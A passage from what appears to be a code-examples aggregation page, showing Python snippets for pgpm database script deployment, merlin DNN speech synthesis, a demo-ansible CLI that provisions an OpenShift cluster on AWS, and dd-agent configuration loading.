                        for statement in sqlparse.split(value):
                            if statement:
                                cur.execute(statement)
                    else:
                        cur.execute(value)
                    self._logger.debug(value)
                    self._logger.debug('{0} executed for schema {1}'.format(key, schema_name))
                    executed_table_scripts.append(key)
                    return_value['table_scripts_deployed'].append(key)
                else:
                    self._logger.debug('{0} is not executed for schema {1} as it has already been executed before. '
                                       .format(key, schema_name))
        else:
            self._logger.debug('No Table DDL scripts to execute')

        # Executing functions
        return_value['function_scripts_deployed'] = []
        if len(function_scripts_dict) > 0:
            self._logger.debug('Running functions definitions scripts')
            for key, value in function_scripts_dict.items():
                # if auto commit mode than every statement is called separately.
                # this is done this way as auto commit is normally used when non transaction statements are called
                # then this is needed to avoid "cannot be executed from a function or multi-command string" errors
                if auto_commit:
                    for statement in sqlparse.split(value):
                        if statement:
                            cur.execute(statement)
                else:
                    cur.execute(value)
                return_value['function_scripts_deployed'].append(key)
            self._logger.debug('Functions loaded to schema {0}'.format(schema_name))
        else:
            self._logger.debug('No function scripts to deploy')

        # Executing views
        return_value['view_scripts_deployed'] = []
        if len(view_scripts_dict) > 0:
            self._logger.debug('Running views definitions scripts')
            for key, value in view_scripts_dict.items():
                # if auto commit mode than every statement is called separately.
                # this is done this way as auto commit is normally used when non transaction statements are called
                # then this is needed to avoid "cannot be executed from a function or multi-command string" errors
                if auto_commit:
                    for statement in sqlparse.split(value):
                        if statement:
                            cur.execute(statement)
                else:
                    cur.execute(value)
                return_value['view_scripts_deployed'].append(key)
            self._logger.debug('Views loaded to schema {0}'.format(schema_name))
        else:
            self._logger.debug('No view scripts to deploy')

        # Executing triggers
        return_value['trigger_scripts_deployed'] = []
        if len(trigger_scripts_dict) > 0:
            self._logger.debug('Running trigger definitions scripts')
            for key, value in trigger_scripts_dict.items():
                # if auto commit mode than every statement is called separately.
                # this is done this way as auto commit is normally used when non transaction statements are called
                # then this is needed to avoid "cannot be executed from a function or multi-command string" errors
                if auto_commit:
                    for statement in sqlparse.split(value):
                        if statement:
                            cur.execute(statement)
                else:
                    cur.execute(value)
                return_value['trigger_scripts_deployed'].append(key)
            self._logger.debug('Triggers loaded to schema {0}'.format(schema_name))
        else:
            self._logger.debug('No trigger scripts to deploy')

        # alter schema privileges if needed
        if (not files_deployment) and mode != 'overwrite' \
                and self._config.scope == pgpm.lib.utils.config.SchemaConfiguration.SCHEMA_SCOPE:
            pgpm.lib.utils.db.SqlScriptsHelper.revoke_all(cur, schema_name, 'public')
            if self._config.usage_roles:
                pgpm.lib.utils.db.SqlScriptsHelper.grant_usage_privileges(
                    cur, schema_name, ', '.join(self._config.usage_roles))
                self._logger.debug('User(s) {0} was (were) granted usage permissions on schema {1}.'
                                   .format(", ".join(self._config.usage_roles), schema_name))
            if self._config.owner_role:
                pgpm.lib.utils.db.SqlScriptsHelper.set_search_path(cur, self._pgpm_schema_name)
                cur.callproc('_alter_schema_owner', [schema_name, self._config.owner_role])
                self._logger.debug('Ownership of schema {0} and all its objects was changed and granted to user {1}.'
                                   .format(schema_name, self._config.owner_role))

        # Add metadata to pgpm schema
        pgpm.lib.utils.db.SqlScriptsHelper.set_search_path(cur, self._pgpm_schema_name)
        cur.callproc('_upsert_package_info'.format(self._pgpm_schema_name),
                     [self._config.name,
                      self._config.subclass,
                      self._config.version.major,
                      self._config.version.minor,
                      self._config.version.patch,
                      self._config.version.pre,
                      self._config.version.metadata,
                      self._config.description,
                      self._config.license,
                      list_of_deps_ids,
                      vcs_ref,
                      vcs_link,
                      issue_ref,
                      issue_link])
        self._logger.debug('Meta info about deployment was added to schema {0}'
                           .format(self._pgpm_schema_name))
        pgpm_package_id = cur.fetchone()[0]
        if len(table_scripts_dict) > 0:
            for key in executed_table_scripts:
                cur.callproc('_log_table_evolution'.format(self._pgpm_schema_name), [key, pgpm_package_id])

        # Commit transaction
        self._conn.commit()

        self._conn.close()

        deployed_files_count = len(return_value['function_scripts_deployed']) + \
                               len(return_value['type_scripts_deployed']) + \
                               len(return_value['view_scripts_deployed']) + \
                               len(return_value['trigger_scripts_deployed']) + \
                               len(return_value['table_scripts_deployed'])

        requested_files_count = len(return_value['function_scripts_requested']) + \
                                len(return_value['type_scripts_requested']) + \
                                len(return_value['view_scripts_requested']) + \
                                len(return_value['trigger_scripts_requested']) + \
                                len(return_value['table_scripts_requested'])

        return_value['deployed_files_count'] = deployed_files_count
        return_value['requested_files_count'] = requested_files_count
        if deployed_files_count == requested_files_count:
            return_value['code'] = self.DEPLOYMENT_OUTPUT_CODE_OK
            return_value['message'] = 'OK'
        else:
            return_value['code'] = self.DEPLOYMENT_OUTPUT_CODE_NOT_ALL_DEPLOYED
            return_value['message'] = 'Not all requested files were deployed'
        return return_value

Example 30

Project: merlin
Source File: dnn_synth_PROJECTION.py
View license
def main_function(cfg, in_dir, out_dir, token_xpath, index_attrib_name, synth_mode, cmp_dir, projection_end):
    ## TODO: token_xpath & index_attrib_name   should be in config
    
    # get a logger for this main function
    logger = logging.getLogger("main")
    
    # get another logger to handle plotting duties
    plotlogger = logging.getLogger("plotting")

    # later, we might do this via a handler that is created, attached and configured
    # but for now we need to do it manually
    plotlogger.set_plot_path(cfg.plot_dir)
    
    #### parameter setting########
    hidden_layers_sizes = cfg.hyper_params['hidden_layers_sizes']
    
    ####prepare environment    
    synth_utts_input = glob.glob(in_dir + '/*.utt')
    ###synth_utts_input = synth_utts_input[:10]   ### temp!!!!!

    if synth_mode == 'single_sentence_demo':
        synth_utts_input = synth_utts_input[:1]
        print 
        print 'mode: single_sentence_demo'
        print synth_utts_input
        print

    indexed_utt_dir = os.path.join(out_dir, 'utt') ## place to put test utts with tokens labelled with projection indices
    direcs = [out_dir, indexed_utt_dir]
    for direc in direcs:
        if not os.path.isdir(direc):
            os.mkdir(direc)
    

    ## was below -- see comment
    if synth_mode == 'single_sentence_demo':
        synth_utts_input = add_projection_indices_with_replicates(synth_utts_input, token_xpath, index_attrib_name, indexed_utt_dir, 100)
    else:
        add_projection_indices(synth_utts_input, token_xpath, index_attrib_name, indexed_utt_dir)




    file_id_list = []
    for fname in synth_utts_input:
        junk,name = os.path.split(fname)
        file_id_list.append(name.replace('.utt',''))


    data_dir = cfg.data_dir

    model_dir = os.path.join(cfg.work_dir, 'nnets_model')
    gen_dir   = os.path.join(out_dir, 'gen')    

    ###normalisation information
    norm_info_file = os.path.join(data_dir, 'norm_info' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim) + '_' + cfg.output_feature_normalisation + '.dat')
    
    ### normalise input full context label
    if cfg.label_style == 'HTS':
        sys.exit('only ossian utts supported')        
    elif cfg.label_style == 'composed':
        suffix='composed'

    # the number can be removed
    binary_label_dir      = os.path.join(out_dir, 'lab_bin')
    nn_label_norm_dir     = os.path.join(out_dir, 'lab_bin_norm')

    binary_label_file_list   = prepare_file_path_list(file_id_list, binary_label_dir, cfg.lab_ext)
    nn_label_norm_file_list  = prepare_file_path_list(file_id_list, nn_label_norm_dir, cfg.lab_ext)

    ## need this to find normalisation info:
    if cfg.process_labels_in_work_dir:
        label_data_dir = cfg.work_dir
    else:
        label_data_dir = data_dir
    
    min_max_normaliser = None
    label_norm_file = 'label_norm_%s.dat' %(cfg.label_style)
    label_norm_file = os.path.join(label_data_dir, label_norm_file)
    
    if cfg.label_style == 'HTS':
        sys.exit('script not tested with HTS labels')


    ## always do this in synth:
    ## if cfg.NORMLAB and (cfg.label_style == 'composed'):  
    logger.info('add projection indices to tokens in test utts')

    ## add_projection_indices was here

    logger.info('preparing label data (input) using "composed" style labels')
    label_composer = LabelComposer()
    label_composer.load_label_configuration(cfg.label_config_file)

    logger.info('Loaded label configuration')

    lab_dim=label_composer.compute_label_dimension()
    logger.info('label dimension will be %d' % lab_dim)
    
    if cfg.precompile_xpaths:
        label_composer.precompile_xpaths()
    
    # there are now a set of parallel input label files (e.g, one set of HTS and another set of Ossian trees)
    # create all the lists of these, ready to pass to the label composer

    in_label_align_file_list = {}
    for label_style, label_style_required in label_composer.label_styles.iteritems():
        if label_style_required:
            logger.info('labels of style %s are required - constructing file paths for them' % label_style)
            if label_style == 'xpath':
                in_label_align_file_list['xpath'] = prepare_file_path_list(file_id_list, indexed_utt_dir, cfg.utt_ext, False)
            elif label_style == 'hts':
                logger.critical('script not tested with HTS labels')        
            else:
                logger.critical('unsupported label style %s specified in label configuration' % label_style)
                raise Exception
    
        # now iterate through the files, one at a time, constructing the labels for them 
        num_files=len(file_id_list)
        logger.info('the label styles required are %s' % label_composer.label_styles)
        
        for i in xrange(num_files):
            logger.info('making input label features for %4d of %4d' % (i+1,num_files))

            # iterate through the required label styles and open each corresponding label file

            # a dictionary of file descriptors, pointing at the required files
            required_labels={}
            
            for label_style, label_style_required in label_composer.label_styles.iteritems():
                
                # the files will be a parallel set of files for a single utterance
                # e.g., the XML tree and an HTS label file
                if label_style_required:
                    required_labels[label_style] = open(in_label_align_file_list[label_style][i] , 'r')
                    logger.debug(' opening label file %s' % in_label_align_file_list[label_style][i])

            logger.debug('label styles with open files: %s' % required_labels)
            label_composer.make_labels(required_labels,out_file_name=binary_label_file_list[i],fill_missing_values=cfg.fill_missing_values,iterate_over_frames=cfg.iterate_over_frames)
                
            # now close all opened files
            for fd in required_labels.itervalues():
                fd.close()
    
    # no silence removal for synthesis ...
    
    ## minmax norm:
    min_max_normaliser = MinMaxNormalisation(feature_dimension = lab_dim, min_value = 0.01, max_value = 0.99, exclude_columns=[cfg.index_to_project])

    (min_vector, max_vector) = retrieve_normalisation_values(label_norm_file)
    min_max_normaliser.min_vector = min_vector
    min_max_normaliser.max_vector = max_vector

    ###  apply precompuated and stored min-max to the whole dataset
    min_max_normaliser.normalise_data(binary_label_file_list, nn_label_norm_file_list)


### DEBUG
    if synth_mode == 'inferred':

        ## set up paths -- write CMP data to infer from in outdir:
        nn_cmp_dir = os.path.join(out_dir, 'nn' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim))
        nn_cmp_norm_dir = os.path.join(out_dir, 'nn_norm'  + cfg.combined_feature_name + '_' + str(cfg.cmp_dim))

        in_file_list_dict = {}
        for feature_name in cfg.in_dir_dict.keys():
            in_direc = os.path.join(cmp_dir, feature_name)
            assert os.path.isdir(in_direc), in_direc
            in_file_list_dict[feature_name] = prepare_file_path_list(file_id_list, in_direc, cfg.file_extension_dict[feature_name], False)        
        
        nn_cmp_file_list         = prepare_file_path_list(file_id_list, nn_cmp_dir, cfg.cmp_ext)
        nn_cmp_norm_file_list    = prepare_file_path_list(file_id_list, nn_cmp_norm_dir, cfg.cmp_ext)



        ### make output acoustic data
        #    if cfg.MAKECMP:
        logger.info('creating acoustic (output) features')
        delta_win = [-0.5, 0.0, 0.5]
        acc_win = [1.0, -2.0, 1.0]
        
        acoustic_worker = AcousticComposition(delta_win = delta_win, acc_win = acc_win)
        acoustic_worker.prepare_nn_data(in_file_list_dict, nn_cmp_file_list, cfg.in_dimension_dict, cfg.out_dimension_dict)

        ## skip silence removal for inference -- need to match labels, which are
        ## not silence removed either


        
    ### retrieve acoustic normalisation information for normalising the features back
    var_dir   = os.path.join(data_dir, 'var')
    var_file_dict = {}
    for feature_name in cfg.out_dimension_dict.keys():
        var_file_dict[feature_name] = os.path.join(var_dir, feature_name + '_' + str(cfg.out_dimension_dict[feature_name]))
        
        
    ### normalise output acoustic data
#    if cfg.NORMCMP:


#### DEBUG
    if synth_mode == 'inferred':


        logger.info('normalising acoustic (output) features using method %s' % cfg.output_feature_normalisation)
        cmp_norm_info = None
        if cfg.output_feature_normalisation == 'MVN':
            normaliser = MeanVarianceNorm(feature_dimension=cfg.cmp_dim)

            (mean_vector,std_vector) = retrieve_normalisation_values(norm_info_file)
            normaliser.mean_vector = mean_vector
            normaliser.std_vector = std_vector

            ###  apply precompuated and stored mean and std to the whole dataset
            normaliser.feature_normalisation(nn_cmp_file_list, nn_cmp_norm_file_list)

        elif cfg.output_feature_normalisation == 'MINMAX':        
            sys.exit('not implemented')
            #            min_max_normaliser = MinMaxNormalisation(feature_dimension = cfg.cmp_dim)
            #            global_mean_vector = min_max_normaliser.compute_mean(nn_cmp_file_list[0:cfg.train_file_number])
            #            global_std_vector = min_max_normaliser.compute_std(nn_cmp_file_list[0:cfg.train_file_number], global_mean_vector)

            #            min_max_normaliser = MinMaxNormalisation(feature_dimension = cfg.cmp_dim, min_value = 0.01, max_value = 0.99)
            #            min_max_normaliser.find_min_max_values(nn_cmp_file_list[0:cfg.train_file_number])
            #            min_max_normaliser.normalise_data(nn_cmp_file_list, nn_cmp_norm_file_list)

            #            cmp_min_vector = min_max_normaliser.min_vector
            #            cmp_max_vector = min_max_normaliser.max_vector
            #            cmp_norm_info = numpy.concatenate((cmp_min_vector, cmp_max_vector), axis=0)

        else:
            logger.critical('Normalisation type %s is not supported!\n' %(cfg.output_feature_normalisation))
            raise
 

    combined_model_arch = str(len(hidden_layers_sizes))
    for hid_size in hidden_layers_sizes:
        combined_model_arch += '_' + str(hid_size)
    nnets_file_name = '%s/%s_%s_%d_%s_%d.%d.train.%d.model' \
                      %(model_dir, cfg.model_type, cfg.combined_feature_name, int(cfg.multistream_switch), 
                        combined_model_arch, lab_dim, cfg.cmp_dim, cfg.train_file_number)

    ### DNN model training
#    if cfg.TRAINDNN: always do this in synth






#### DEBUG
    inferred_weights = None ## default, for non-inferring synth methods
    if synth_mode == 'inferred':

        ## infer control values from TESTING data

        ## identical lists (our test data) for 'train' and 'valid' -- this is just to
        ##   keep the infer_projections_fn theano function happy -- operates on
        ##    validation set. 'Train' set shouldn't be used here.
        train_x_file_list = copy.copy(nn_label_norm_file_list)
        train_y_file_list = copy.copy(nn_cmp_norm_file_list)
        valid_x_file_list = copy.copy(nn_label_norm_file_list)
        valid_y_file_list = copy.copy(nn_cmp_norm_file_list)

        print 'FILELIST for inferr:'
        print train_x_file_list 
        print 

        try:
            inferred_weights = infer_projections(train_xy_file_list = (train_x_file_list, train_y_file_list), \
                        valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
                        nnets_file_name = nnets_file_name, \
                        n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
                        hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot)
           
        except KeyboardInterrupt:
            logger.critical('train_DNN interrupted via keyboard')
            # Could 'raise' the exception further, but that causes a deep traceback to be printed
            # which we don't care about for a keyboard interrupt. So, just bail out immediately
            sys.exit(1)
        except:
            logger.critical('train_DNN threw an exception')
            raise






    ## if cfg.DNNGEN:
    logger.info('generating from DNN')

    try:
        os.makedirs(gen_dir)
    except OSError as e:
        if e.errno == errno.EEXIST:
            # not an error - just means directory already exists
            pass
        else:
            logger.critical('Failed to create generation directory %s' % gen_dir)
            logger.critical(' OS error was: %s' % e.strerror)
            raise



    gen_file_list = prepare_file_path_list(file_id_list, gen_dir, cfg.cmp_ext)

    #print nn_label_norm_file_list  ## <-- this WAS mangled in inferred due to copying of file list to trainlist_x etc. which is then shuffled. Now use copy.copy
    #print gen_file_list

    weights_outfile = os.path.join(out_dir, 'projection_weights_for_synth.txt')  
    dnn_generation_PROJECTION(nn_label_norm_file_list, nnets_file_name, lab_dim, cfg.cmp_dim, gen_file_list, cfg=cfg, synth_mode=synth_mode, projection_end=projection_end, projection_weights_to_use=inferred_weights, save_weights_to_file=weights_outfile )
    
    logger.debug('denormalising generated output using method %s' % cfg.output_feature_normalisation)
    ## DNNGEN

    fid = open(norm_info_file, 'rb')
    cmp_min_max = numpy.fromfile(fid, dtype=numpy.float32)
    fid.close()
    cmp_min_max = cmp_min_max.reshape((2, -1))
    cmp_min_vector = cmp_min_max[0, ] 
    cmp_max_vector = cmp_min_max[1, ]

    if cfg.output_feature_normalisation == 'MVN':
        denormaliser = MeanVarianceNorm(feature_dimension = cfg.cmp_dim)
        denormaliser.feature_denormalisation(gen_file_list, gen_file_list, cmp_min_vector, cmp_max_vector)
        
    elif cfg.output_feature_normalisation == 'MINMAX':
        denormaliser = MinMaxNormalisation(cfg.cmp_dim, min_value = 0.01, max_value = 0.99, min_vector = cmp_min_vector, max_vector = cmp_max_vector)
        denormaliser.denormalise_data(gen_file_list, gen_file_list)
    else:
        logger.critical('denormalising method %s is not supported!\n' %(cfg.output_feature_normalisation))
        raise

    ##perform MLPG to smooth parameter trajectory
    ## lf0 is included, the output features much have vuv. 
    generator = ParameterGeneration(gen_wav_features = cfg.gen_wav_features)
    generator.acoustic_decomposition(gen_file_list, cfg.cmp_dim, cfg.out_dimension_dict, cfg.file_extension_dict, var_file_dict)    

            ## osw: skip MLPG:
#            split_cmp(gen_file_list, ['mgc', 'lf0', 'bap'], cfg.cmp_dim, cfg.out_dimension_dict, cfg.file_extension_dict)    

    ## Variance scaling:
    scaled_dir = gen_dir + '_scaled'
    simple_scale_variance(gen_dir, scaled_dir, var_file_dict, cfg.out_dimension_dict, file_id_list, gv_weight=0.5)  ## gv_weight hardcoded

    ### generate wav ---- glottHMM only!!!
    #if cfg.GENWAV:
    logger.info('reconstructing waveform(s)')
    generate_wav_glottHMM(scaled_dir, file_id_list)   # generated speech

Example 31

Project: demo-ansible
Source File: run.py
View license
@click.command()

### Cluster options
@click.option('--cluster-id', default='demo', show_default=True,
              help='Cluster identifier (used for prefixing/naming various items created in AWS')
@click.option('--num-nodes', type=click.INT, default=1, show_default=True,
              help='Number of application nodes')
@click.option('--num-infra', type=click.IntRange(1,3), default=1,
              show_default=True, help='Number of infrastructure nodes')
@click.option('--hexboard-size', type=click.Choice(hexboard_sizes),
              help='Override Hexboard size calculation (tiny=32, xsmall=64, small=108, medium=266, large=512, xlarge=1026)',
              show_default=True)
@click.option('--console-port', default='443', type=click.IntRange(1,65535), help='OpenShift web console port',
              show_default=True)
@click.option('--api-port', default='443', type=click.IntRange(1,65535), help='OpenShift API port',
              show_default=True)
@click.option('--deployment-type', default='openshift-enterprise', help='openshift deployment type',
              show_default=True)
@click.option('--default-password', default='openshift3',
              help='password for all users', show_default=True)

### Smoke test options
@click.option('--run-smoke-tests', is_flag=True, help='Run workshop smoke tests')
@click.option('--num-smoke-test-users', default=5, type=click.INT,
              help='Number of smoke test users', show_default=True)
@click.option('--run-only-smoke-tests', is_flag=True, help='Run only the workshop smoke tests')

### AWS/EC2 options
@click.option('--region', default='us-east-1', help='ec2 region',
              show_default=True)
@click.option('--ami', default='ami-2051294a', help='ec2 ami',
              show_default=True)
@click.option('--master-instance-type', default='m4.large', help='ec2 instance type',
              show_default=True)
@click.option('--infra-instance-type', default='m4.2xlarge', help='ec2 instance type',
              show_default=True)
@click.option('--node-instance-type', default='m4.large', help='ec2 instance type',
              show_default=True)
@click.option('--keypair', default='default', help='ec2 keypair name',
              show_default=True)

### DNS options
@click.option('--r53-zone', help='route53 hosted zone (must be pre-configured)')
@click.option('--app-dns-prefix', default='apps', help='application dns prefix',
              show_default=True)

### Subscription and Software options
@click.option('--package-version', help='OpenShift Package version (eg: 3.2.1.9)',
              show_default=True, default='3.2.1.9')
@click.option('--rhsm-user', help='Red Hat Subscription Management User')
@click.option('--rhsm-pass', help='Red Hat Subscription Management Password',
                hide_input=True,)
@click.option('--skip-subscription-management', is_flag=True,
              help='Skip subscription management steps')
@click.option('--use-certificate-repos', is_flag=True,
              help='Uses certificate-based yum repositories for the AOS content. Requires providing paths to local certificate key and pem files.')
@click.option('--aos-repo', help='An alternate URL to locate software')
@click.option('--prerelease', help='If using prerelease software, set to true',
              show_default=True, default=False, is_flag=True)
@click.option('--kerberos-user', help='Kerberos userid (eg: jsmith) for use with --prerelease')
@click.option('--kerberos-token', help='Token to go with the kerberos user for use with --prerelease')
@click.option('--registry-url', help='A URL for an alternate Docker registry for dockerized components of OpenShift',
              show_default=True, default='registry.access.redhat.com/openshift3/ose-${component}:${version}')

### Miscellaneous options
@click.option('--no-confirm', is_flag=True,
              help='Skip confirmation prompt')
@click.option('--debug-playbook',
              help='Specify a path to a specific playbook to debug with all vars')
@click.option('--cleanup', is_flag=True,
              help='Deletes environment')
@click.help_option('--help', '-h')
@click.option('-v', '--verbose', count=True)

def launch_demo_env(num_nodes,
                    num_infra,
                    hexboard_size=None,
                    region=None,
                    ami=None,
                    no_confirm=False,
                    master_instance_type=None,
                    node_instance_type=None,
                    infra_instance_type=None,
                    keypair=None,
                    r53_zone=None,
                    cluster_id=None,
                    app_dns_prefix=None,
                    deployment_type=None,
                    console_port=443,
                    api_port=443,
                    package_version=None,
                    rhsm_user=None,
                    rhsm_pass=None,
                    skip_subscription_management=False,
                    use_certificate_repos=False,
                    aos_repo=None,
                    prerelease=False,
                    kerberos_user=None,
                    kerberos_token=None,
                    registry_url=None,
                    run_smoke_tests=False,
                    num_smoke_test_users=None,
                    run_only_smoke_tests=False,
                    default_password=None,
                    debug_playbook=None,
                    cleanup=False,
                    verbose=0):

  # Force num_masters = 3 because of an issue with API startup and ELB health checks and more
  num_masters = 3

  # If not running cleanup need to prompt for the R53 zone:
  if r53_zone is None:
    r53_zone = click.prompt('R53 zone')

  # Cannot run cleanup with no-confirm
  if cleanup and no_confirm:
    click.echo('Cannot use --cleanup and --no-confirm as it is not safe.')
    sys.exit(1)

  # If skipping subscription management, must have cert repos enabled
  # If cleaning up, this is ok
  if not cleanup:
    if skip_subscription_management and not use_certificate_repos:
      click.echo('Cannot skip subscription management without using certificate repos.')
      sys.exit(1)

  # If using subscription management, cannot use certificate repos
  if not skip_subscription_management and use_certificate_repos:
    click.echo('Must skip subscription management when using certificate repos')
    sys.exit(1)

  # Prompt for RHSM user and password if not skipping subscription management
  if not skip_subscription_management:
    # If the user already provided values, don't bother asking again
    if rhsm_user is None:
      rhsm_user = click.prompt("RHSM username?")
    if rhsm_pass is None:
      rhsm_pass = click.prompt("RHSM password?", hide_input=True, confirmation_prompt=True)

  # User must supply a repo URL if using certificate repos
  if use_certificate_repos and aos_repo is None:
    click.echo('Must provide a repo URL via --aos-repo when using certificate repos')
    sys.exit(1)

  # User must supply kerberos user and token with --prerelease
  if prerelease and ( kerberos_user is None or kerberos_token is None ):
    click.echo('Must provider --kerberos-user / --kerberos-token with --prerelease')
    sys.exit(1)

  # Override hexboard size calculation
  if hexboard_size is None:
    if num_nodes <= 1:
      hexboard_size = 'tiny'
    elif num_nodes < 3:
      hexboard_size = 'xsmall'
    elif num_nodes < 5:
      hexboard_size = 'small'
    elif num_nodes < 9:
      hexboard_size = 'medium'
    elif num_nodes < 15:
      hexboard_size = 'large'
    else:
      hexboard_size = 'xlarge'

  # Calculate various DNS values
  host_zone="%s.%s" % (cluster_id, r53_zone)
  wildcard_zone="%s.%s.%s" % (app_dns_prefix, cluster_id, r53_zone)

  # Display information to the user about their choices
  click.echo('Configured values:')
  click.echo('\tcluster_id: %s' % cluster_id)
  click.echo('\tami: %s' % ami)
  click.echo('\tregion: %s' % region)
  click.echo('\tmaster instance_type: %s' % master_instance_type)
  click.echo('\tnode_instance_type: %s' % node_instance_type)
  click.echo('\tinfra_instance_type: %s' % infra_instance_type)
  click.echo('\tkeypair: %s' % keypair)
  click.echo('\tnodes: %s' % num_nodes)
  click.echo('\tinfra nodes: %s' % num_infra)
  click.echo('\tmasters: %s' % num_masters)
  click.echo('\tconsole port: %s' % console_port)
  click.echo('\tapi port: %s' % api_port)
  click.echo('\tdeployment_type: %s' % deployment_type)
  click.echo('\tpackage_version: %s' % package_version)

  if use_certificate_repos:
    click.echo('\taos_repo: %s' % aos_repo)

  click.echo('\tprerelease: %s' % prerelease)

  if prerelease:
    click.echo('\tkerberos user: %s' % kerberos_user)
    click.echo('\tkerberos token: %s' % kerberos_token)

  click.echo('\tregistry_url: %s' % registry_url)
  click.echo('\thexboard_size: %s' % hexboard_size)
  click.echo('\tr53_zone: %s' % r53_zone)
  click.echo('\tapp_dns_prefix: %s' % app_dns_prefix)
  click.echo('\thost dns: %s' % host_zone)
  click.echo('\tapps dns: %s' % wildcard_zone)

  # Don't bother to display subscription manager values if we're skipping subscription management
  if not skip_subscription_management:
    click.echo('\trhsm_user: %s' % rhsm_user)
    click.echo('\trhsm_pass: *******')

  if run_smoke_tests or run_only_smoke_tests:
    click.echo('\tnum smoke users: %s' % num_smoke_test_users)

  click.echo('\tdefault password: %s' % default_password)

  click.echo("")

  if run_only_smoke_tests:
    click.echo('Only smoke tests will be run.')

  if debug_playbook:
    click.echo('We will debug the following playbook: %s' % (debug_playbook))

  if not no_confirm and not cleanup:
    click.confirm('Continue using these values?', abort=True)

  # Special confirmations for cleanup
  if cleanup:
    click.confirm('Delete the cluster %s' % cluster_id, abort=True)
    click.confirm('ARE YOU REALLY SURE YOU WANT TO DELETE THE CLUSTER %s' % cluster_id, abort=True)
    click.confirm('Press enter to continue', abort=True, default=True)

  playbooks = []

  if debug_playbook:
    playbooks = [debug_playbook]
  elif run_only_smoke_tests:
    playbooks = ['playbooks/projects_setup.yml']
  elif cleanup:
    playbooks = ['playbooks/cleanup.yml']
  else:

    # start with the basic setup
    playbooks = ['playbooks/cloudformation_setup.yml']

    # if cert repos, then add that playbook
    if use_certificate_repos:
      playbooks.append('playbooks/certificate_repos.yml')

    # if not cert repos, add the register hosts playbook
    if not use_certificate_repos:
      playbooks.append('playbooks/register_hosts.yml')
    
    # add the setup and projects playbooks
    playbooks.append('playbooks/openshift_setup.yml')
    playbooks.append('playbooks/projects_setup.yml')

  for playbook in playbooks:

    # hide cache output unless in verbose mode
    devnull='> /dev/null'

    if verbose > 0:
      devnull=''

    # refresh the inventory cache to prevent stale hosts from
    # interferring with re-running
    command='inventory/aws/hosts/ec2.py --refresh-cache %s' % (devnull)
    os.system(command)

    # remove any cached facts to prevent stale data during a re-run
    command='rm -rf .ansible/cached_facts'
    os.system(command)

    command='ansible-playbook -i inventory/aws/hosts -e \'cluster_id=%s \
    ec2_region=%s \
    ec2_image=%s \
    ec2_keypair=%s \
    ec2_master_instance_type=%s \
    ec2_infra_instance_type=%s \
    ec2_node_instance_type=%s \
    r53_zone=%s \
    r53_host_zone=%s \
    r53_wildcard_zone=%s \
    console_port=%s \
    api_port=%s \
    num_app_nodes=%s \
    num_infra_nodes=%s \
    num_masters=%s \
    hexboard_size=%s \
    deployment_type=%s \
    package_version=-%s \
    rhsm_user=%s \
    rhsm_pass=%s \
    skip_subscription_management=%s \
    use_certificate_repos=%s \
    aos_repo=%s \
    prerelease=%s \
    kerberos_user=%s \
    kerberos_token=%s \
    registry_url=%s \
    run_smoke_tests=%s \
    run_only_smoke_tests=%s \
    num_smoke_test_users=%s \
    default_password=%s\' %s' % (cluster_id,
                    region,
                    ami,
                    keypair,
                    master_instance_type,
                    infra_instance_type,
                    node_instance_type,
                    r53_zone,
                    host_zone,
                    wildcard_zone,
                    console_port,
                    api_port,
                    num_nodes,
                    num_infra,
                    num_masters,
                    hexboard_size,
                    deployment_type,
                    package_version,
                    rhsm_user,
                    rhsm_pass,
                    skip_subscription_management,
                    use_certificate_repos,
                    aos_repo,
                    prerelease,
                    kerberos_user,
                    kerberos_token,
                    registry_url,
                    run_smoke_tests,
                    run_only_smoke_tests,
                    num_smoke_test_users,
                    default_password,
                    playbook)

    if verbose > 0:
      command += " -" + "".join(['v']*verbose)
      click.echo('We are running: %s' % command)

    status = os.system(command)
    if os.WIFEXITED(status) and os.WEXITSTATUS(status) != 0:
      return os.WEXITSTATUS(status)

  # if the last run playbook didn't explode, assume cluster provisioned successfully
  # but make sure that user was not just running tests or cleaning up
  if os.WIFEXITED(status) and os.WEXITSTATUS(status) == 0:
    if not debug_playbook and not run_only_smoke_tests and not cleanup:
      click.echo('Your cluster provisioned successfully. The console is available at https://openshift.%s:%s' % (host_zone, console_port))
      click.echo('You can SSH into a master using the same SSH key with: ssh -i /path/to/key.pem [email protected]%s' % (host_zone))
      click.echo('**After logging into the OpenShift console** you will need to visit https://metrics.%s and accept the Hawkular SSL certificate' % ( wildcard_zone ))
      click.echo('You can access Kibana at https://kibana.%s' % ( wildcard_zone ))

    if cleanup:
      click.echo('Your cluster, %s, was de-provisioned and removed successfully.' % (cluster_id))

Example 32

Project: dd-agent
Source File: config.py
View license
def get_config(parse_args=True, cfg_path=None, options=None):
    if parse_args:
        options, _ = get_parsed_args()

    # General config
    agentConfig = {
        'check_freq': DEFAULT_CHECK_FREQUENCY,
        'dogstatsd_port': 8125,
        'dogstatsd_target': 'http://localhost:17123',
        'graphite_listen_port': None,
        'hostname': None,
        'listen_port': None,
        'tags': None,
        'use_ec2_instance_id': False,  # DEPRECATED
        'version': get_version(),
        'watchdog': True,
        'additional_checksd': '/etc/dd-agent/checks.d/',
        'bind_host': get_default_bind_host(),
        'statsd_metric_namespace': None,
        'utf8_decoding': False
    }

    if Platform.is_mac():
        agentConfig['additional_checksd'] = '/opt/datadog-agent/etc/checks.d'

    # Config handling
    try:
        # Find the right config file
        path = os.path.realpath(__file__)
        path = os.path.dirname(path)

        config_path = get_config_path(cfg_path, os_name=get_os())
        config = ConfigParser.ConfigParser()
        config.readfp(skip_leading_wsp(open(config_path)))

        # bulk import
        for option in config.options('Main'):
            agentConfig[option] = config.get('Main', option)

        # Store developer mode setting in the agentConfig
        if config.has_option('Main', 'developer_mode'):
            agentConfig['developer_mode'] = _is_affirmative(config.get('Main', 'developer_mode'))

        # Allow an override with the --profile option
        if options is not None and options.profile:
            agentConfig['developer_mode'] = True

        #
        # Core config
        #ap
        if not config.has_option('Main', 'api_key'):
            log.warning(u"No API key was found. Aborting.")
            sys.exit(2)

        if not config.has_option('Main', 'dd_url'):
            log.warning(u"No dd_url was found. Aborting.")
            sys.exit(2)

        # Endpoints
        dd_urls = map(clean_dd_url, config.get('Main', 'dd_url').split(','))
        api_keys = map(lambda el: el.strip(), config.get('Main', 'api_key').split(','))

        # For collector and dogstatsd
        agentConfig['dd_url'] = dd_urls[0]
